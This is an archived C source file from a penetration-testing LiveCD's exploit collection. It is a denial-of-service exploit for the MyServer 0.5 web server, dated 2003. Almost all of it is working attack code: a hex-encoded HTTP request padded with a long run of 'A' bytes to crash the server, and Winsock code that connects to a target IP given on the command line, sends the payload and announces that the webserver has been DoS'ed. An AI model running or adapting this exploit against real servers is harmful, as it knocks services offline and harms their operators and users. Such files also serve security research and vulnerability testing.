home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / myServer / sp-myserver0.5-dos.c < prev   
C/C++ Source or Header  |  2005-02-12  |  5KB  |  143 lines
  1. /* MyServer 0.5 DoS 
  2.    vendor:
  3.    http://myserverweb.sourceforge.net
  4.  
  5.    coded and discovered by:
  6.    badpack3t <badpack3t@security-protocols.com>
  7.    for .:sp research labs:.
  8.    www.security-protocols.com
  9.    11.12.2003
  10.   
  11.    usage: 
  12.    sp-myserv <targetip> [targetport] (default is 80)
  13.  */
  14.  
  15. // #include "stdafx.h"
  16. #include <winsock2.h>
  17. #include <stdio.h>
  18.  
  19. #pragma comment(lib, "ws2_32.lib")
  20.  
  21. char exploit[] = 
  22.  
  23. /* entire request */
  24. "\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"
  25. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  26. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  27. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  28. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  29. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  30. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  31. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  32. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  33. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  34. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  35. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  36. "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  37. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  38. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  39. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  40. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  41. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  42. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  43. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  44. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  45. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  46. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  47. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  48. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  49. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  50. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"
  51. "\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"
  52. "\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"
  53. "\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"
  54. "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"
  55. "\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"
  56. "\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"
  57. "\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65"
  58. "\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"
  59. "\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"
  60. "\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"
  61. "\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"
  62. "\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"
  63. "\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"
  64. "\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
  65. "\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"
  66. "\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"
  67. "\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"
  68. "\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"
  69. "\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"
  70. "\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"
  71. "\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"
  72. "\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"
  73. "\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"
  74. "\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"
  75. "\x0d\x0a";
  76.  
  77. int main(int argc, char *argv[])
  78. {
  79.     WSADATA wsaData;
  80.     WORD wVersionRequested;
  81.     struct hostent  *pTarget;
  82.     struct sockaddr_in     sock;
  83.     char *target;
  84.     int port,bufsize;
  85.     SOCKET mysocket;
  86.     
  87.     if (argc < 2)
  88.     {
  89.         printf("MyServer 0.5 DoS by badpack3t\r\n <badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
  90.         printf("Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
  91.         printf("www.security-protocols.com\r\n\r\n", argv[0]);
  92.         exit(1);
  93.     }
  94.  
  95.     wVersionRequested = MAKEWORD(1, 1);
  96.     if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
  97.  
  98.     target = argv[1];
  99.     port = 80;
  100.  
  101.     if (argc >= 3) port = atoi(argv[2]);
  102.     bufsize = 1024;
  103.     if (argc >= 4) bufsize = atoi(argv[3]);
  104.  
  105.     mysocket = socket(AF_INET, SOCK_STREAM, 0);
  106.     if(mysocket==INVALID_SOCKET)
  107.     {    
  108.         printf("Socket error!\r\n");
  109.         exit(1);
  110.     }
  111.  
  112.     printf("Resolving Hostnames...\n");
  113.     if ((pTarget = gethostbyname(target)) == NULL)
  114.     {
  115.         printf("Resolve of %s failed\n", argv[1]);
  116.         exit(1);
  117.     }
  118.  
  119.     memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
  120.     sock.sin_family = AF_INET;
  121.     sock.sin_port = htons((USHORT)port);
  122.  
  123.     printf("Connecting...\n");
  124.     if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
  125.     {
  126.         printf("Couldn't connect to host.\n");
  127.         exit(1);
  128.     }
  129.  
  130.     printf("Connected!...\n");
  131.     printf("Sending Payload...\n");
  132.     if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
  133.     {
  134.         printf("Error Sending the Exploit Payload\r\n");
  135.         closesocket(mysocket);
  136.         exit(1);
  137.     }
  138.  
  139.     printf("Remote Webserver has been DoS'ed \r\n");
  140.     closesocket(mysocket);
  141.     WSACleanup();
  142.     return 0;
  143. }